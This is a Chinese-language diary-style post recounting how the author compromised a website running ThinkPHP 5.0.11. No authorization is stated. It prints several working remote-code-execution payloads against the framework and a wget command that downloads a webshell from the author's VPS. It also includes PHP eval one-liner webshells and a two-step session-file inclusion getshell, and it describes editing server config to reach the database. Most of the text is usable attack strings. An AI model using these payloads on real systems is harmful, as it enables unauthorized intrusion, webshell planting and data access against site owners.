今天很有感觸,我決定從今天開始記錄我在ax的點點滴滴,自己的學長都是一步一個腳印走出來,加油,阿鑫。
首先進入網站,xxxx/ 随便輸入xxx/admin 然後報錯
然後去網上搜尋tp5.0.11的exp打,然後找了一個exp,這tm不直接滲透結束?
然後看了一下函數,禁止了system,assert函數
這裡再附上幾個exp,如果沒有禁,可以直接打,
_method=__construct&filter[]=system&method=get&get[]=phpinfo
_method=__construct&filter[]=assert&server[]=phpinfo&get[]=phpinfo
然後我就用了甯外一個exp
wget自己的vps下馬,
http://5.com/index.php?s=portal/\think\app/invokefunction&function=call_user_func_array&vars[0]=exec&vars[l][]=wget%20https://vps//fw.php
這裡我也記一下自己彩的坑,tp5常用的子產品 portal index admin user captcha 這幾個 當時一直報錯沒有此子產品
然後第二個最開始我用的curl下載下傳,下了半天也沒有反應,才知道curl被禁了
終于下好了,最開下的txt,能通路,然後下的phpinfo,也能通路,最後下一句話,出問題了,有waf,寫不進去
然後自己分析一波,發現<>被轉義了,換
<?php @eval($_POST['cai']);?> 然後就是這這樣構造去寫小馬,
\<\?php eval(\$\_POST\[cai\]); 還是連不上
然後我就去找卿師傅要了一個馬,在此謝謝卿師傅。成功連上拿下shell
然後檢視資料庫,卻發現連接配接不上,應該是做了限制,然後去修改檔案,繞過限制
1.在host /etc/hosts 檔案裡映射一個vps的伺服器位址
2.在my.conf檔案裡 /etc/my.conf /etc/mysql/my.conf 寫入skip-name-resolve此注釋socket=/var下面
卻發現自己的權限不夠,提權沒有必要,主要是太菜了,然後就去下了一個adminer.php
最開始死活也登不上去,後來機靈了一下,決定不要放到根目錄,果然,拿下
最後問了下旁邊的同僚,他告訴我,其實php7可以日志shell,我不信,結果10分鐘搞定了,看了一下時間,中午12點,網易雲時間到了
附上同僚的exp
_method=__construct&filter[]=think\Session::set&method=get&get[]=<?php eval($_POST['x'])?>&server[]=1
_method=__construct&method=get&filter[]=think\__include_file&get[]=/tmp/sess_test1&server[]=1&x=
2步,直接拿下